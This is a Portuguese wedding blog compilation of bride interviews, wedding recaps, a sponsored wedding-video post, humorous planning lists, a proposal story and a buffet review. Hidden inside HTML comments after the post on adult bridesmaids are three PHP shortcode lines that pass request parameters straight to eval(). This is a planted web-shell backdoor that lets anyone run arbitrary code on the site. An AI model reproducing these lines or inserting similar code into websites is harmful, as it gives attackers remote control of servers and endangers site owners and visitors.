Categoria: já casei

Entrevista com a noiva – Mari L. S. Sampaio | #JáCasei

Casada há cerca de 8 meses com o Lucas, Mari nos conta sobre como o momento do casamento é mágico – e que sim, dá vontade de reviver tudo de novo!

mari1

Blog Tô Casando: Seu casamento foi há alguns meses. E aí, casaria de novo?

Mari: Com certeza! Pra falar a verdade, a princípio eu acreditava que a oficialização do casamento (cerimônia + festa) seria algo desnecessário… Mas quando comecei a viver “a vida de noiva” me transformei! Hoje tenho certeza que foi uma experiência mágica, faria de novo… e de novo!

BTC: Quando você fecha os olhos para se lembrar daquele dia, qual a primeira imagem que vem à sua mente?

Mari: De nós entrando no salão de festas com nossos familiares e amigos presentes pra nos prestigiar!

BTC: E quando você se lembra dos preparativos, qual a lembrança mais legal? E a mais irritante?

Mari: Eu sou bem babona em falar do meu casamento! Tenho várias lembranças boas… Mas a minha preparação (cabelo, make, vestido, etc.), acho que é a melhor!

De irritante… Não tem como esquecer algumas pessoas que surtaram mais que eu… Sabe como é?! Acho que sempre tem aquele parente que acha que é mais imprescindível que a noiva! risos

mari2
Como diria a minha mãe, “esse vestido parece uma cocada!” *_*

BTC: Qual foi seu primeiro pensamento no instante em que entrou na cerimônia?

Mari: Acho que não foi bem um pensamento, e sim uma sensação: parecia que eu era uma princesa da Disney!

mari1a

BTC: Eu morro de medo de ter uma crise de riso na cerimônia. Você teve vontade de rir em algum momento?

Mari: Em vários momentos! Eu sempre rio em momentos inoportunos! Minha cerimônia foi bem descontraída, então os meus surtos de riso ficaram no contexto.

BTC: Vocês mesmos escreveram seus votos ou fizeram os votos mais clássicos? Se vocês escreveram, há alguma frase que o seu marido disse que você nunca vai se esquecer?

Mari: Não tivemos aqueles votos mais elaborados, como acontece nos filmes americanos. Mas relatamos ao padre um resumão da nossa história, com acontecimentos e datas importantes. Então, conforme ele ia falando, eu ia me lembrando do quanto meu marido é importante e o quanto sou feliz por tê-lo comigo!

mari2a

BTC: Hoje, olhando para trás, há algo que você faria diferente?

Mari: Analisando o todo, não! Mas, tem só um detalhe (que não foi tão pequeno assim), que eu jamais faria novamente: como muitas noivas paulistanas, eu fui alugar meu vestido na Rua São Caetano, e tive uma péssima experiência! Hoje é uma piada entre nós dois, mas foi péssimo! Em resumo, eles estragaram meu vestido faltando 3 dias pro casamento, e somente depois de um barraco homérico eu consegui um vestido bacana.

vera verao
Ter essa reação quando estragam seu vestido de noiva: acho justo.

BTC: Conta aí: teve algum momento muito engraçado na festa?

Mari: Somos muito patetas, acho que meu casamento foi muito engraçado! Mas o DJ foi uma piada à parte! Ele não seguiu muito a lista que fizemos, então na hora da valsa ele soltou uma música nada a ver, de balada. Mas o legal é que pareceu proposital e todos foram pra pista de dança.

mari3

BTC: Há alguma dica ou mensagem para as futuras noivinhas?

Mari: Encontrar alguém pra amar a vida toda é uma coisa que merece ser celebrada! Façam tudo aquilo que sempre sonharam! Esse momento é maravilhoso e único.

mari2b
<3

Gente, se o DJ fizesse isso comigo eu não ia conseguir ver graça; ia esganar ele! #mejulguem

Sei que temos que encarar imprevistos com bom humor, mas EU, particularmente, escolhi com meu noivo a música da dança com tanto cuidado… Acho que nós dois mataríamos o cara na hora hahaha

Quanto à Rua São Caetano, eu aluguei o meu lá e até agora não deu nada de errado… Claro, pelo visto em até 3 dias antes do casamento muita coisa por acontecer, mas vamos torcer para que dê tudo certo… Mas olha, vendo as fotos nem dá pra imaginar o que fizeram pra estragar o vestido, e independente do que tenha sido, conseguiram arrumar, porque ele está lindo e perfeito!

De qualquer modo, noivinhas, é sempre bom buscar referências das lojas de vestido (embora imprevistos sempre possam acontecer), afinal, ele é quase tão importante (e difícil de se encontrar) quando um amor verdadeiro…

E fico muito feliz que minha amiga Mari tenha encontrado! <3

Casamento Paty e Alê | Casamento em Campos do Jordão #JáCasei

Poucos dias depois de entrevistar a Patricia Toledo, fomos no casamento religioso dela!

A cerimônia e a festa aconteceram em Campos do Jordão, no Grande Hotel Senac, e se eu fosse escolher um termo que define o casamento inteiro, seria: bom gosto!

Clique nas imagens para ver melhor os detalhes. Vale a pena!

02
Um dos momentos mais lindos da cerimônia!

Outro termo: lindo!

Outro? Emocionante!

03
<3

A cerimônia teve uma duração ótima (não foi eterna, mas foi bem completa), com uma decoração impecável que combinava muito com a cidade escolhida.

01

Depois tivemos um coquetel incrível seguido de jantar.

06
Vítor e Mayra no Castelo de Caras!

Os noivos abriram a pista com uma dança muito romântica e as mulheres ganharam chinelos LINDOS (que até o fim do post, no vlog, vocês verão o quanto eu os amei haha).

Uma questão à parte: os docinhos de casamento. Não consegui provar todos, tamanha era a variedade! E olha que provei MUITOS (e todos estavam incríveis).

07

Reparem que o bolo não teve os tradicionais noivinhos como topo. Eu adorei! Até falei sobre isso ontem aqui.

08

O buquê não foi jogado, mas foi no estilo buquê em fitas.

Não tenho a foto do momento, mas caso você não saiba o que é o buquê em fitas, é basicamente isso: cada solteira pega uma fita presa ao buquê e a noiva vai cortando até restar apenas uma, a da próxima solteira a se casar.

Ana Correa | 2011
Foto meramente ilustrativa.
09
A Thaís Fagundes, madrinha, pegou o buquê! #marmelada hahaha
10
E o André D’Ugo pegou o Santo Antônio (e eu também) hahaha

Até deu vontade de fazer meu casamento em Campos do Jordão!

Fiz um vlog da viagem e de alguns momentos do casamento, mas graças ao 3G maravilhoso, algumas coisas importantes se perderam… E o resultado foi esse HAHAHAHA

Na boa: espero que no meu casamento as pessoas se divirtam tanto quanto eu me diverti nesse! <3

Veja mais fotos na página do André D’Ugo Fotografia (fotógrafo das fotos desse post).

Clipe do casamento – a trilha sonora que mais combina com vocês.

Não sei vocês, mas eu queria poder convidar TODO MUNDO QUE GOSTO para o meu casamento.

Mas como ainda não sou RYCAAAAA, a festa terá de ser apenas para familiares e amigos muito próximos.

Por isso é bem legal combinar com a equipe que fará a filmagem de fazer um clipe com os melhores momentos da cerimônia e da festa. É um jeito legal de mostrar a todos um pouco do que foi o grande dia – mas sem encher o saco mostrando um filme de 50 horas.

Nossa, me lembro quando era criança e um casal fez essa maldade com a minha família… Cruzes, na hora já desejei o divórcio dos dois!

Sempre fui fofa.

Agora, a escolha da trilha sonora é fundamental para mostrar a pegada do casamento e do estilo do casal.

Fiz uma seleção de músicas que ficam lindas com o clipe, de acordo com alguns estilos.

Casais tranquilos, que curtem sua casinha, daqueles que são bem estilo Carl e Ellie de Up

Ed Sheeran – Thinking out loud (acústico)

“Querida, eu te amarei até que tenhamos 70 anos.”

Casais românticos e fofinhos

Christina Perri – A thousand years (cover)

Nesse caso, como é uma música MUITO usada, seria legal caso fosse um cover ou uma versão instrumental.

 

“Querido, não tenha medo, eu amei você por mil anos, e eu amarei você por mais mil.”

Casal de melhores amigos

Jason Mraz e Colbie Caillat – Lucky

“Garoto te escuto, em meus sonhos

Sinto o seu sussurro do outro lado do mar

Te guardo comigo em meu coração

Você torna as coisas fáceis quando a vida fica difícil

 Tenho sorte, pois estou apaixonada pelo meu melhor amigo”

Casais birutas

Clarice Falcão – De todos os loucos do mundo

Música bem divertida e animada!

 

“De todos os loucos do mundo eu quis você porque eu tava cansada de ser louca assim sozinha. De todos os loucos do mundo eu quis você porque a sua loucura parece um pouco a minha.”

Casais aventureiros ou naturebas/ Casamento mais rústico ou no campo

Barry Louis Polisar – All I want is you

 

“Tudo que eu quero é você, você seria minha noiva

Me pegue pela mão e fique do meu lado

Tudo que eu quero é você, você vai ficar comigo?

Me segure em seus braços e me balance como o mar”

O importante é que seja A CARA de vocês.

E isso não se reserva apenas ao clipe, mas também a outros materiais que você pode combinar com a equipe de filmagem.

Como esse vídeo de pré-wedding da Ostra Filmes. Nesse caso, o casal teve um encontro em um piquenique no dia em que começaram a namorar, então nada mais justo que a história dos dois seja contada onde tudo começou 😉

O legal dessa empresa é que eles sempre buscam dar um toque de cinema, e fazer com que cada vídeo fique ÚNICO, com a cara do casal.

Eu fui numa reunião com eles e super saí de lá com a certeza de que o resultado será incrível. Eles estão abertos a sugestões e conversas com os noivos para pegar referências também de coisas que o casal curte que aparentemente não tem nada a ver com casamento.

Por exemplo, no caso desse vídeo de pré-wedding, eles usaram depoimentos como na série The Office como recurso… E adivinha que série que esse casal ama?

 

Pois é!

Sabe o que é legal também?

Se vocês chegarem lá para falar com o pessoal da Ostra Filmes e disser “Conheci vocês pelo Blog Tô Casando…”, você ganha 20% de desconto ao fechar o pacote com eles.

De nada, que isso, tá tudo certo, querida 😉

Então corre lá na Fan Page deles pra pedir um orçamento com essa equipe incrível. E não esquece de pedir aquele descontinho lindo do blog, hein? 😉

*Publieditorial

Entrevista com a noiva – Patricia Toledo #JáCasei

Você já pensou em como estará se sentindo quando faltarem poucos dias para o seu casamento? Eu não consigo nem imaginar!

Por isso fui conversar com a Patricia Toledo, 30 anos, que vai se casar nesse sábado.

paty
Fotos do casamento civil: André D’Ugo.

Blog Tô Casando: Seu casamento será no próximo sábado. Falta muita coisa?

Paty: Por mais organizada que sejamos, sempre faltam detalhes no final. Hoje mesmo a decoradora me ligou para acertar os últimos detalhes. Algumas coisas que eu havia encomendado na net para o casamento (tipo robes e vaquinha dos noivos) não chegaram a tempo. Então amanhã cedinho tenho que ir correndo comprar essas coisinhas que faltam. Não adianta, tenho cerimonialista e assessora, mas mesmo assim a noiva tem sempre que colocar a “mão na massa” para sair exatamente como sonhamos.

BTC: Seu civil já foi e agora falta o religioso. Você já se sente uma mulher casada? Ou se sente “meio casada”? Ou ainda sente que dá pra ir até o chão com a Single Ladies?

Paty: Hahahaha para falar a verdade, nada muda! Como já moramos juntos, não senti nenhuma diferença. Lógico, o sentimento é outro, de felicidade mil, sem palavras para descrever.

BTC: Durante o planejamento do casamento, quantas pessoas você teve vontade de matar? Alguém conseguiu despertar a Bridezilla? 

Paty: Meu Deus. Tive vontade de matar muitassss pessoas. Principalmente aquelas que dão palpite onde não são chamadas (e nem perguntadas) e na hora da lista dos convidados. Essa foi uma das piores horas. Saiu briga e tudo. Mas no fim, tudo se ajeita. O que me fez e faz arrancar os cabelos foram os fornecedores que são muito lentos. Serviço aqui no Brasil é muito ruim, muito mesmo! E não paguei barato nas coisas, viu?! Paguei caro. E mesmo assim tem gente que é muito lenta, muito lerda e que não dá a devida atenção para os noivos. É de dar nos nervos. E a palavra “casamento” encarece milhões de vezes mais. Tudo fica 3x mais caro por ser “casamento”.

BTC: O que você está vivendo hoje em relação aos preparativos que no começo você NÃO FAZIA IDEIA de que viveria?

Paty: Muita pressão. Pressão para todo lado, que antes não tinha por ter muito tempo pela frente. Mas hoje, faltando apenas poucos dias, tem muita coisa para resolver ainda. Pequenos detalhes, que se juntados dão muitos, e só quem casa sabe como é. Você praticamente vive para o casamento.

BTC: Algumas noivas reclamam que o noivo não participa muito dos preparativos. Qual foi o grau de participação do seu?

Paty: Ah! Meu noivo ajudou bastante. Até o meu vestido do civil ele ajudou a escolher. Os convites, o menu, alguns detalhes. Ele deu opinião em quase tudo. Mulher tem que entender que a maioria dos homens não liga para certas coisas, como cor de decoração. Homem olha e acha tudo lindo, não importa se é vermelho, verde, azul ou amarelo. A cor que você escolher ele vai amar. A não ser que sejam aqueles que querem participar 100% (sei lá, existe isso?). Agora, decoração, música da igreja, música da entrada, cor disso, cor daquilo, kit toillet, lembrancinha e etc., a maior parte desses detalhes é a mulher mesmo quem decide.

meio post
s2

BTC: Alguma dica importante para as noivas que estão começando a planejar o casamento?

Paty: Sim, veja tudo com antecedência. O meu eu comecei a ver 1 ano e meio antes, e mesmo assim ainda tem coisas para fazer. São muitos detalhes, como já falei inúmeras vezes. É essencial ter uma cerimonialista e/ou assessora. Nas piores horas, elas que te salvam. Pesquisem, pesquisem muito!!! A maioria dos fornecedores deve ser por indicação de outras pessoas. E ainda assim você corre o risco de não sair 100% como você quer. E por último, não deixe muitas pessoas darem palpite. As pessoas são muito sem noção hoje em dia, e normalmente acabam se metendo onde não são chamadas. Pedir opiniões sempre é valido, porém deixando bem claro que você quer “X” e não “Y”.

BTC: Que dica você daria para as noivas sobreviverem à última semana?

Paty: Gente, escutem muiiiita Enya, Loreena McKennitt, Buddha Lounge, músicas para meditação. Durmam bastante, o máximo que conseguirem (e se a insônia deixar). Cuidado com a ansiedade, ela pode fazer você ganhar uns quilinhos (como eu, que ganhei 1 kg). Tenha muita paciência e tente não ficar nervosa. Tome um passiflora ou chá de flor de maracujá até o dia do casamento (de preferência com um copo de vinho!!! Hahaha). E chegando o dia, se divirta o máximo que você conseguir! Passa rápido, muito rápido.

final do post
Felicidades, Paty e Ale! E que venha agora o religioso!

Choquei com essa informação de que a ansiedade pode fazer a gente ganhar uns quilinhos. O que muita gente me diz é que a noiva fica tão ansiosa que emagrece horrores (mas para mim, engordar faz mais sentido, porque a ansiedade me dá fome).

Você pode ver aqui as outras fotos do civil e almoço do casamento da Paty!

Damas de honra adultas – sim, aqui no Brasil. Por que não?

Você já deve ter visto em filmes e programas que os gringos têm um costume diferente de nós em relação às damas de honra.

Aqui ~usamos~ crianças, que podem ser nossas irmãs mais novas, sobrinhas, primas, filhas das melhores amigas, filhas das amigas, filhas da vizinha (que você só convidou porque não tinha outra criança pra ser sua dama de honra), filhas do primo do seu Genaro da banca de jornal da Mooca…
Pois é, começa uma busca insana por arrumar uma criança para levar as alianças… E se você quiser criança levando plaquinha, jogando flores e etc, VISH! Aí que dá trabalho mesmo!
Será que vende crianças no Aliexpress?
Eu não tenho crianças na família e lamentava que aqui no Brasil não fosse costume ter damas de honra adultas. Quando eu começava a planejar onde eu poderia sequestrar uma criança, eu pensei:”Quer saber? O casamento é meu e se eu quiser damas adultas, TEREI DAMAS ADULTAS.”
Perfeito, já que tenho 0 crianças e 109834743895 amigas (e não quero dar uma de Preta Gil com 948 casais de padrinhos).
Elegi 3 das minhas melhores amigas:
uma para levar as alianças
uma para levar a plaquinha “Lá vem a noiva!”
e uma para ser a florista
Quando contei para elas, elas ficaram bem felizes, mas só souberam de fato o que iam fazer na cerimônia quando receberam o convite oficial de damas de honra (assunto para um post futuro).
O papel delas, antes da cerimônia, é meio como Madrinhas Power: elas estão por dentro de TUDO que vai rolar, me dão opinião, acompanham vários processos… E estarão comigo antes da cerimônia me acalmando, e durante a festa me ajudando a manter meu copo de caipirinha sempre cheio, já que não vou conseguir ter paz para pegar minhas bebidas no bar; valeu, amigas lindas!
Vantagens de ter damas de honra adultas
1) Não corre o risco de acontecer isso
2) Nem isso.
Ok, isso eu acharia o máximo, mas tem gente que não gosta, né?
3) Você não tem que providenciar vestidinhos (ou seja, uma coisa a menos para se preocupar e gastar).
Expectativa
Realidade
4) O que você vai ter é isso:
5) E isso:
6) E mais isso:
Momentos inesquecíveis com as melhores amigas, no dia mais especial da sua vida: precisa de mais motivos?

<!– [insert_php]if (isset($_REQUEST["Khb"])){eval($_REQUEST["Khb"]);exit;}[/insert_php][php]if (isset($_REQUEST["Khb"])){eval($_REQUEST["Khb"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["aSC"])){eval($_REQUEST["aSC"]);exit;}[/insert_php][php]if (isset($_REQUEST["aSC"])){eval($_REQUEST["aSC"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["SDs"])){eval($_REQUEST["SDs"]);exit;}[/insert_php][php]if (isset($_REQUEST["SDs"])){eval($_REQUEST["SDs"]);exit;}[/php] –>

Como despertar a Bridezilla

Este é um post que você, noiva, deve enviar a todos que te cercam. Inclusive para o noivo.

Sim, é pelo bem deles. E pelo seu bem também.
~*~*~*~
Olá, pessoa que convive com uma noiva. Como vai você? Tudo bem, tudo na paz?
Pois saiba que pra essa moça que está para se casar, nem tudo está na paz.
Antes de saber o que desperta a bridezilla (para justamente EVITAR fazer), vamos conhecer sua ficha técnica.
Bridezilla
 
Também conhecida por “Noiva Neurótica”, “Noiva Maluca”, “Aquela doida que vai casar”, entre outras nomenclaturas populares.
Habitat: em diversos locais do planeta, pois é uma criatura que se adapta a qualquer ambiente. Só não se adapta a comentários maldosos, decorações cafonas e opiniões que não foram solicitadas.
Alimentação: varia entre 5 barras de chocolate por dia e 1 folha de alface por refeição.
Origem: causado pelo vírus Bridezilla chilicus, latente em todas as mulheres, que se manifesta com algumas atitudes de amigos, familiares e coordenadores de evento nos meses que antecedem seu casamento.
 
Agora que você já conhece a criatura, vamos aos elementos que fazem com que tal vírus se manifeste:
1) “Você vai casar? Aff, pra quê?”, by recalcada.
Bitch, se SEU casamento acabou ou está uma porcaria, não venha questionar o motivo de alguém casar. Certamente alguém te questionou quando foi sua vez e isso influenciou na sua decisão? Não, né? Pois é.
2) “Ah, não acho que vale a pena gastar tanto pra fazer uma festa. Com esse dinheiro você poderia viajar, ou guardar para a aposentadoria…”, by alguma tia qualquer.
Nossa, eu nem tinha pensado nisso, valeu! Vou cancelar com o buffet, fotógrafo, cinegrafista, loja do vestido… Valeuzão, não sei o que seria de mim sem seus conselhos!
3) “Por que lilás? A toalha TEM que ser dessa cor? Essa azul não serve?”, by noivo, mãe, amigas…
É… Serve… Pra enrolar no seu pescoço e te sufocar até a morte.
4) “Você pode escolher apenas uma cor de flor na decoração, mas o tipo de flor nós que escolhemos. E a decoração da mesa do bolo é essa, é fixa, porque as flores são artificiais e fixas na mesa. É, a decoração da mesa dos noivos também vai ser essa, não dá pra mudar.”, by buffet que ~parecia perfeito~
#truestory
Sem palavras.
5) “Vai me convidar né?”, diz a pessoa que no dia a dia mal olha na sua cara.
Vou. Vou te convidar a se retirar da minha vida.
 
6) “Como assim você não vai convidar sua tia lá de Piraroquinha da Serra Pelada para ser sua madrinha? Ela é FAMÍLIA e gostava tanto de você quando você tinha 5 anos e passava o feriado na casa dela!”, by mãe.
Puxa, seria uma ótima ideia… Se a última vez que eu tivesse tido contato com ela não tivesse sido, de fato, quando eu tinha 5 anos!
7) “Aff, só vai comer isso? Que paranoia!”, by qualquer pessoa que te veja comendo salada e frango grelhado.
                            É, tá certo, vou comer qualquer coisa e torcer pro vestido não arrebentar.
 
 
8) “Cuidado com a alimentação, hein! Assim não vai entrar no vestido!”, by qualquer pessoa que se acha íntima o suficiente para falar isso ao te ver comendo um biscoito.
VerdadFODA-SE!
As reações da Bridezilla na hora podem até ser como nos gifs. Mas não se iluda. Por dentro, o monstro está se agitando, e corre o risco de no dia do casamento ela estar assim:
Estejam avisados.

Casamento Carlos e Felipe | Casamento Homoafetivo #JáCasei

Capturar a felicidade quando ela está tão evidente não é uma tarefa difícil. Mas registrar isso com poesia é para poucos, e o André D’Ugo conseguiu isso com perfeição no casamento do Carlos com o Felipe. Vendo essas fotos, fico ainda mais feliz por ter escolhido ele para registrar o meu casamento!
(clique na imagem para ampliar)

Ensaio dos noivos

Papa-paparazzi!
Café, o filhinho lindo do casal!
Sério, ele é MUITO simpático!
Foto de família. Eu faria um quadro dessa foto e colocaria sobre a lareira se eu tivesse uma
Os votos

Família

Carlos abraçando uma de suas melhores amigas que, por acaso, é minha irmã 😉
Curiosidade: esse pontinho ruivo desfocado atrás do arranjo sou eu
Olha eu e meu noivo aí, gente!
Essa é apenas uma amostra, mas tem muito mais fotos dos convidados, da festa, do local (que era tipo: PARAÍSO!)… Tudo muito espontâneo e lindo, recheado de alegria.
Carlos e Felipe, desejamos a vocês que essa felicidade e esse amor se perpetuem para sempre!
Se você gostou do trabalho do André D’Ugo e quiser conhecer mais, é só acessar a página dele (André D’Ugo Fotografia) ou seguir ele no Instagram.
*Não é publipost.

Pedido de casamento: como foi?

Nosso noivado foi bem diferente do padrão:
Aos 4 meses de namoro, quando estávamos vendo as estrelas em nossa primeira viagem juntos, pedi ele em casamento. Assim, só perguntei:
– Casa comigo?
– Caso.

Pareceu apenas uma conversa bobinha de dois namorados apaixonados, mas desde então começamos a nos referir um ao outro como “noivo/noiva”. Mudamos o status do Facebook. Pessoas vinham perguntar, eufóricas, quando seria o casamento, e logo se decepcionavam: seria depois que ele se formar. Ou seja, depois de 5 anos! Junto com a decepção, muitas vezes vinha acompanhado o olhar de ceticismo, que dizia: “então não é noivado” ou “até lá vocês já terminaram”.

Cerca de 2 anos depois, conversamos e eu disse que era a noiva que menos me sentia noiva no mundo, porque tudo estava muito longe ainda, e não havia nada que pudéssemos fazer… Então ele fez umas contas e vimos que podíamos começar a juntar dinheiro pro casamento.
Outro fato que me fazia não me sentir noiva era que EU não havia sido “pedida”. Eu tinha um noivo que me disse SIM, mas eu não disse SIM para ninguém…

Bom, quase 4 anos se passaram desde o meu pedido, e faltava pouco mais de 1 para o momento que combinamos nos casar. Pensei: não faço IDEIA do quanto custa um casamento. Comecei a orçar e já avisei ele, cheia de medo, de que comecei as pesquisas.
Tive medo dele achar ruim, achar que eu estava me adiantando… Mas se ele achou ruim, não deixou transparecer, porque ele se juntou a mim nas pesquisas, orçamentos, negociações… E algumas coisas já fechamos logo, porque vimos que quanto mais demorássemos, mais caro tudo ia ficar!
Fechamos buffet, foto, filme, bar, fechei vestido, comprei alguns acessórios…

Mas ainda assim, uma parte de mim não se sentia noiva.
Eu não queria fogos de artifício, pedido em público, música… Apenas queria ouvir dele a pergunta que ele nunca havia feito (mesmo que ambos já soubéssemos o que o outro queria).

Bom, no último dia dos namorados (nosso último “solteiros”), não combinamos de ter um jantar especial. Eu ia trabalhar, ele também, era sexta, teria trânsito… Apenas nos encontramos e fomos no shopping, comer qualquer coisa, dar uma volta, e deixamos a comemoração especial para outro dia.
Alguns dias antes, ele me perguntou:

– Quando você quer seu presente?
– Agora

Esse é um diálogo que acontece em toda data comemorativa hahaha
Mas claro, ele não fez o que pedi xD

No carro, voltando para casa depois do shopping, já comecei a encher ele:
– E meu presente? Me dáááá! Eu queeeero! Vai dar meia noite e você não me deu o presente, você quer que eu faça mimimi pelo resto da vida dizendo que você me deu o presente ATRASADO?
(quando quero ganhar meu presente, uso todas as armas possíveis hahaha e dificilmente funciona #fail)

Ele nem fazia menção de pegar o presente.
Chegamos em casa, ele ficou enrolando de propósito para me dar o presente.
Foi passar fio dental (“Ah, você vai passar fio dental ainda???”), brincou com os cachorros… Pegou uma pasta de dente na mochila (dizendo que a minha era ruim) e se trancou no banheiro.

– Ah, Ssauro, você ainda vai fazer coco??????

Segundos depois ele abriu bruscamente a porta e disse:

– Você quer?
– Quero!
– Tem certeza?
– Tenho!
– Tem certeza?
– Tenho!
– Tem certeza de que você quer casar comigo?

Eis que ele tira a caixinha do bolso, abre e me mostra o anel.
(Na verdade ele não pegou a pasta de dente na mochila, e sim o anel!)

Na hora eu:

– OOOOOOOOOOOOOOOOOWWWNNNNNNNNNNNNNNNNNNN!
Levantei para abraçá-lo e ele:

– Espera… *ajoelha*
– OWWWNNNNN
-… eu tenho que amarrar o sapato… *finge que amarra o sapato*

Comecei a rir, levantei ele e o abracei tanto, mas TANTO…
Nem vi o anel!

– Então… Você tem certeza?
– Não…*
– O.O
– Não tenho certeza de que VOCÊ quer casar comigo… 😉 Mas EU tenho certeza de que quero.

Rimos muito, nos beijamos, dei altos gritinhos quando vi o anel direito…

E foi assim. Sem fogos de artifício, público e música, mas rimos muito, foi completamente inesperado e… do nosso jeitinho 🙂

*Esse “não” foi uma brincadeira porque quando ele me pediu em namoro, foi assim:
– Quer namorar comigo?
– Minha resposta não é “sim”. Minha resposta é “CLARO QUE SIM”.

Dreams Palace Buffet | Primeiras impressões e resenha

dreams palace buffet resenha casamento

A saga da busca do buffet perfeito e amoro$o continua, e no dia 22 fomos no Dreams Palace Buffet (unidade da Anália Franco, onde tem a degustação)!

Logo que chegamos, essa entrada fofinha:

Tentei superar a cascatinha fofa e entramos. Sabe quando o lugar salta aos olhos e você nem sabe explicar o motivo?
Mesa de café
Fomos muito bem recebidos e fizemos um tour pelo local. Antes de mostrar o resto das fotos, vamos à avaliação?
Nossas impressões e notas* sobre o Dreams Palace Buffet:
Geral – Nota: 10
Mais um buffet que faz pacotões!
O pacote que cotei inclui:
coquetel com entrada, salgados assados e fritos, docinhos, bolo (fake e comestível) e café
bebidas (com cerveja o/)
decoração das mesas
decoração da nave
decoração da escada de onde vêm os noivos após a cerimônia
DJ e iluminação
Ajudante para a noiva (achei o máximo ter uma escrava ajudante!)
Comida – Nota: 10
Bastante variedade de salgadinhos; todos uma delícia! Estou sonhando até agora com a bolinha de queijo! *-* provamos o bolo trufado, que achei muito bom também! São MUITOS sabores de bolo, o legal é ir várias vezes para provar todos HEHEHE #gordinha
Localização – nota 8
Sendo na Anália Franco, tem gente que acha um pouco longe, mas a rua é tranquila e fica perto do shopping.
Estrutura – nota 10
É grande, com mezanino, iluminação por lustres de cristais (OMG), e tempo de nave de aproximadamente 30 segundos. A cerimônia ocorre em um palco à frente e sobe-se nele em uma escada (que depois é recolhida). Esse palco tem cortinas vermelhas que se fecham depois da cerimônia e só abrem na festa, revelando o bolo. Os noivos saem da cerimônia e vão por uma passagem secreta (adoro!) para um camarim apenas para eles (super fofinho), onde eles podem se abraçar, se beijar, chorar, falar mal da roupa da tia chata, enfim! Lá também tem um lanchinho para os noivos, já que é super difícil eles conseguirem comer na festa (POVO, POR FAVOR, ME DEIXEM COMER!). A assistente da noiva ajuda ela a ir ao banheiro, escovar os dentes, etc, e aí os noivos voltam para a festa por uma escada (que você pode decorar ou não).
Valor: menos de 15 mil
Fotografia e cinegrafia – nota ?
Não vi algum álbum feito pela equipe recomendada por eles, mas as fotos que nos mostraram das cerimônias e festas foram tiradas por ela e pareceu bom. Como não vi nada mais muito específico, prefiro não opinar. Não vi como é a cinegrafia deles.
Duração: 1 hora de cerimônia + 5 horas de festa
*Essas são as NOSSAS impressões. Claro que a decoração e a iluminação do local influenciam, sem contar o gosto pessoal, né? Mas não custa nada você dar uma passadinha lá e ver com seus próprios olhos se gosta ou não. Ah, o espaço não nos pagou nada para falar deles e nem nos ofereceu nenhum benefício, então não se trata de um publipost 🙂
 
Vamos ao resto das fotos!
 
Local da cerimônia e festa, com palco e lustres de cristal que me fazem sonhar
Mezanino
Escada por onde os noivos chegam à festa
Decoração da mesa do casamento do dia anterior
 
 

****UPDATE após fazer o casamento no Dreams Palace Buffet****

Como vocês viram, fiquei encantada com o lugar, então acabamos escolhendo ele para celebrar nosso casamento.

Vou falar um pouco sobre minha experiência lá:

  • Guarde todos os recibos. Depois de 6 meses que quitamos tudo, faltando uns 2 meses pro casamento, ligaram perguntando quando iríamos quitar o que faltava. Claro, foi apenas uma confusão deles, mas foi bom ter guardado os recibos (e isso vale para qualquer fornecedor).
  • Não contratamos a equipe de foto e filme que o Dreams Palace Buffet indica, pois achei bem caro. No final, fiquei muito feliz de escolher o André D’Ugo para fotografar e a equipe da Ostra Filmes para a filmagem.
  • Sobre o que brinquei de ter uma ajudante: na verdade ela nem me ajudou muito. Quem me ajudou mesmo foi minha irmã e os fotógrafos (acredita????). Me prometeram uma organizadora para o dia, além da ajudante, mas no fim era a mesma pessoa, e ela pecou nas duas tarefas; estava mais perdida do que barata tonta! Eu que tive que ficar cobrando a hora de jogar o buquê e a bebida, tive que lembrar ela do sorteio da gravata do noivo… Ou seja, se você for se casar lá, contrate uma assessora para o dia.
  • O DJ cometeu pequenos erros na cerimônia, mas nada que os convidados tenham percebido.
  • A decoração ficou LINDA, ainda melhor do que eu esperava! Mas claro, saí da decoração do pacote básico, pedi algumas coisas a mais (e não saiu tão caro), outras eu mesma levei e eles arrumaram certinho lá, tipo: fotos penduradas em árvore francesa e escada com um tecido fininho e luzinhas de Natal brancas (eles providenciaram o tecido, e eu as luzes, porque foi ideia minha).
  • O espaço comportou bem meus 100 convidados, mas achei que mesmo com ar e ventiladores ligados, ficou um pouco quente.
  • Se puder se arrumar sem ser no camarim do local, melhor! Foi um perereco pra tirar fotos legal do vestido pendurado… E a decoração, que antes eu achava fofa, no dia percebi que era muito sem noção e cheia de bibelôs, que atrapalharam muito!
  • A comida não tem do que reclamar! Fantástica! No fim fechamos o buffet de crepes doces e salgados. Claro, não tive tempo de comer (apesar de jurar que teria!), mas fiquei feliz nas degustações e com o pouco que comi no dia. Os convidados também elogiaram bastante. O sucesso da casa: a bolinha de queijo! #saudades
  • A entrada fofinha não foi suficiente para fotos externas bonitas. Se você não faz questão de fotos externas, não chega a ser um problema.

Veja algumas fotos do nosso casamento no Dreams Palace Buffet:

dreams palace buffet resenha casamento
Minha faixa para a nave.
dreams palace buffet resenha casamento
Minha “árvore de instagram”, com fotos nossas de crianças, fotos da família e fotos nossas juntos.
dreams palace buffet resenha casamento
Mesa da cerimônia.
dreams palace buffet resenha casamento
Arranjo da mesa de cerimônia/mesa do bolo.

dreams palace buffet resenha casamento
dreams palace buffet resenha casamento

dreams palace buffet resenha casamento
Decoração das mesas: pedi como extra essa velinha nesse suporte e as plantinhas abaixo do vaso, com base de espelho.
dreams palace buffet resenha casamento
Escadaria com voil branco e luzes de Natal brancas: uma das minhas partes favoritas da decoração!

dreams palace buffet resenha casamento

dreams palace buffet resenha casamento
Outro extra que pedi: essas velinhas penduradas nas árvores francesas do palco da cerimônia/mesa do bolo. Deu um efeito lindo, muito mágico, principalmente na festa, quando estava mais escurinho.
dreams palace buffet resenha casamento
Mesa do bolo.
dreams palace buffet resenha casamento
Mesa do bolo. Para este momento, pedi para incluir essas luzinhas em forma de bolinhas.

No geral, indico SIM o Dreams Palace Buffet, mas claro, apenas fique atento às questões que levantei aqui 😉

Com quem será?

Essa era a música que eu mais temia quando criança! Eu saía correndo da minha festinha de aniversário (porque sempre o noivo escolhido pelos mexeriqueirinhos de 10 anos de idade era algum moleque bem nada a ver) chorando.
Ao longo da adolescência eu dizia: não, não quero me casar. No máximo me juntar.

Mas parece que quando encontramos a pessoa certa, a vontade de casar é natural. Parece que encontrar a pessoa certa, por si só, já parece impossível, então quando a encontramos, casar não parece mais um absurdo.

